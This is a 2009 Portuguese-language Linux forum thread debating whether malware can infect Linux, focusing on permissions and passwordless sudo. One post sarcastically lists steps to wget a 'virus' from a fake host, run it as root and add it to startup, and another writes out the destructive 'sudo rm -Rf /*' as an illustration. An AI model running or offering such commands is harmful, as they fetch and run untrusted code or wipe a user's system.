Malwares no Linux [RESOLVIDO]

davi_to
(usa Debian)

Enviado em 29/08/2009 - 16:16h

Caros colegas,

Vendo umas notícias na internet recentemente, li que foram criados malwares que infectam o MacOs através de falsos sites de updates. Como existe uma grande discussão em torno da (frágil) segurança do Windows (independentemente da versão utilizada), fico na dúvida sobre o que aconteceria se começassem a criar malwares pra Linux também. Como usuário, sempre utilizo uma conta com restrições porque logar sempre como root é um risco enorme!

Mas me veio a tal dúvida na mente depois de ter lido a notícia mencionada no início (até porque os fãs de Mac alegam usar um sistema mais seguro).

Na opinião de vocês, quais os possíveis efeitos no sistema e o que a comunidade pode fazer pra evitar que essas ameaças se espalhem, caso elas de fato surjam? E outra: existe algum vírus que infecta Linux?

Por enquanto é isso.
falou...

andrezc
(usa Debian)

Enviado em 29/08/2009 - 16:18h

Os arquivos no Linux não são auto-executaveis como no Win, e tem o sistema de permições também, o cara teria que dar a senha root, compilar... Pra se infectar, acredito eu que ninguém é burro ao bastante para isso, ainda mais usuarios de Linux, que geralmente são usuarios mais avançados.

davi_to
(usa Debian)

Enviado em 29/08/2009 - 16:26h

e o sudo não facilitaria em alguma coisa, se mal configurado?

pinduvoz
(usa Debian)

Enviado em 29/08/2009 - 16:32h

Eu uso o sudo sem senha para o meu usuário e nunca tive problemas.

Mas como também tenho curiosidade sobre o assunto, vou acompanhar a discussão.

andrezc
(usa Debian)

Enviado em 29/08/2009 - 16:42h

1- Primeiro, baixe o virus:

$wget http://naoexiste.com.certeza/virus.tar.gz

2-Descompacte o Virus:

$tar -zxvf virus.tar.gz

3-Entre na pasta criada:

$cd virus

4-De permissao de execução para o arquivo de configuração, se caso houver:

$chmod +x ./configue

5-Execute o arquivo para compilar:

$./configure

6-Vire root para completar a compilação e instalação do virus:

$su

7-Execute o Virus:

#virus

Tipo, uma boa opção é criar um link simbolico do virus para ser inicializado junto com o sistema, ao duas formas:

#ln -sf /usr/bin/virus /etc/rc.0/virus

ou

#cat > /usr/bin/virus /etc/rc.local

Como todo mundo percebeu, é necessario OBRIGATORIAMENTE a ação do usuario para que a coisa funcione.

pinduvoz
(usa Debian)

Enviado em 29/08/2009 - 16:56h

Bom, acho que um vírus poderia ser instalado como binário (já compilado, portanto), desde que seja possível explorar uma brecha em algum programa que esteja sendo executado.

Só tenho uma dúvida:

A necessidade de permissão de execução barraria tal façanha?

davi_to
(usa Debian)

Enviado em 29/08/2009 - 17:09h

pois eh, pinduvoz, por isso questionei sobre o comando sudo.

com um sudo mal configurado, basta clicar... às vezes penso que algumas facilidades no linux poderiam (me) complicar mais na frente...

acredito que o linux é bem seguro e também tiro o chapéu pro sistema de permissões, mas é um detalhe que há algum tempo me incomoda.

lembro que vi pela primeira vez o sudo no Kurumin, e nem precisava de senha. Em outras distribuições é solicitada a senha do usuário. O problema é caso se utilize o sudo e não seja solicitada a senha.

E poderia ser encontrado um script com a sequência de comando prontinha.

Repito: sou fã do esquema de permissões, mas ainda tenho dúvidas quanto à utilização do sudo.

removido
(usa Nenhuma)

Enviado em 29/08/2009 - 17:51h

mano, nao sei se alguem ja percebeu "acredito que o pidovuz jah!!!" em varios topicos eu falo sobre o sudo, e na minha opiniao eu digo

SIM!!! um sudo mal configurado "padrao do ubuntu" eh uma falha enorme no sistema

a maioria dos usuarios deixam o sudo ativado para qualquer usuario, acredito eu que o sudo mal configurado torna o linux ateh mais vulneravel que o windows

oq aconteceria esse comando??

$ rm -Rf /*

que tal esse comando???

$ sudo rm -Rf /*

======================================

podemos ver uma grande diferença, o primeiro nao iria acontecer nada a mais que basicamente diser: vc nao tem permissao

agr o segundo iria detonar com tudo de mais sagrado no linux

com o sudo ativado tona muito mais facil criar virus p/ linux pelo proprio shell

=====================================

acredite, vc nunca vai estar seguro, mas se quiser algo mais seguro que linux!!! os BSDs estão ai, mas nao eh tao facil migrar nao, mas nao eh impossivel neh xD

====================================================

OBS: por isso uso slackware, afinal no slackware nao eh nada muito automatico, vc que torna ele ao seu gosto, ao contrario de algumas distribuições que vc que tem de acostumar com os padroes das distribuições, pelo menos isso que eu axo!!!

pinduvoz
(usa Debian)

Enviado em 29/08/2009 - 18:05h

O problema seria o sudo sem senha, já que com senha ela seria solicitada (e vc perceberia que algo está tentando modificar seu sistema).

Sem senha, dá para confiar nas permissões, ou, em outras palavras, o sistema de permissões barraria o malware?

Mais um detalhe: nunca tive medo do sudo sem senha, pois o Kurumin era configurado assim e o Morimoto não é um "cara qualquer".

Teixeira
(usa Linux Mint)

Enviado em 29/08/2009 - 19:18h

Vamos colocar da seguinte forma:
Se comparado com o Linux, o Windows é realmente um poço de insegurança, pois pode aceitar a execução de macros e scripts à distância com a maior facilidade.
Muitas vezes o que nos livra disso é um Firefox da vida, que se recusa e executar códigos ou abrir páginas que julgue "estranhos", solicitando nossa permissão.
No entanto, Linux e Mac podem ser atacados de outras formas, não necessariamente por virus, mas por outros tipos de códigos maliciosos, porém SEMPRE COM A APROVAÇÃO DO ADMINISTRADOR.
No Basic Linux (baseado na Slackware) as senhas estão desativadas para economizar espaço na distro e portanto todo usuário é "root" - e mesmo assim é mais seguro que o Windows mesmo cercado de antivirus.
Note-se também que certas senhas são facilmente recuperáveis ou capturáveis (já vi esse mesmo fenômeno em várias outras distros).

Resumindo: O usuário é geralmente o responsável direto por abrir a guarda e as portas, seja isso no Linux, no Mac ou no Windows.
No entanto, ele somente fará isso se o administrador, responsável indireto, tiver dado permissão para isso.

Surgiu-me teoricamente uma hipótese, de distribuição de alguma distro modificada de forma específica a produzir um determinado efeito. Embora tal possibilidade seja muito remota, isso não seria impossível de ser feito.

Portanto, todo cuidado é pouco.

cezarlamann
(usa OpenSuSE)

Enviado em 29/08/2009 - 19:27h

Olha, quando algumas pessoas me perguntam sobre malwares pra linux eu levo em consideração algumas coisas:

1o.: A maioria das principais distros (menos *buntu's e ubuntu's like) não tem sudo preconfigurado sem senha. Veja por exemplo o que diz o terminal na hora do sudo (Aqui no Debian, mas é igual no Fedora e no openSuSE (que tenho na vm)):

[sudo] password for kaiser:
kaiser is not in the sudoers file. This incident will be reported.

2o.: pra escrever qualquer coisa no /, só como root

3o.: pra exploitar algum pacote, vale lembrar que apesar de parecidos, a setlist de pacotes de cada distro é diferente, tem permissões diferentes, e algumas vezes, locais diferentes. Logo, em uma distro que não tiver o pacote afetado pelo exploit instalado, não irá correr riscos...

4o.: Exploitagem de Kernel (como aquele exploit dos kernels<2.6.17 que permitia "rootagem" com user comum) talvez seja a unica que funcione de fato... Mas considero que pra um user comum que usa xDSL, o modem/router dá uma dificultada com o NAT interno. Empresas podem se defender melhor configurando o iptables corretamente ou até mesmo valendo-se de firewalls físicos. Talvez os mais vulneráveis (IMO) seriam os usuários de cable modem (bridge)

5o.: se for um script, vai chegar uma hora que, se o user não for root, vai pedir a senha pra algo...

6o.: se for um user de Slackware e derivados, o sistema talvez nem saiba que sudo existe alí...

Então, acredito que demorará pra chegar os dias em que o linux comece realmente a ter virus como o Windows...

Abraço.

pinduvoz
(usa Debian)

Enviado em 29/08/2009 - 19:36h

Que o Linux é mais seguro, todos sabemos.

Mas o Mac, que usa um Kernel BSD, foi invadido mais rapidamente do que o Windows Vista, como se pode ver aqui:

http://forum.macnews.com.br/index.php?showtopic=13665

O problema do Mac era o Safari, o navegador web da Apple.

No mesmo concurso, PWN 2 OWN, ninguém conseguiu invadir o Ubuntu (que representava o Linux).

Agora a pergunta: uma vez invadido o Linux, o invasor pode executar código através do sudo sem senha, ou mesmo como root? Se pode, ninguém está realmente seguro.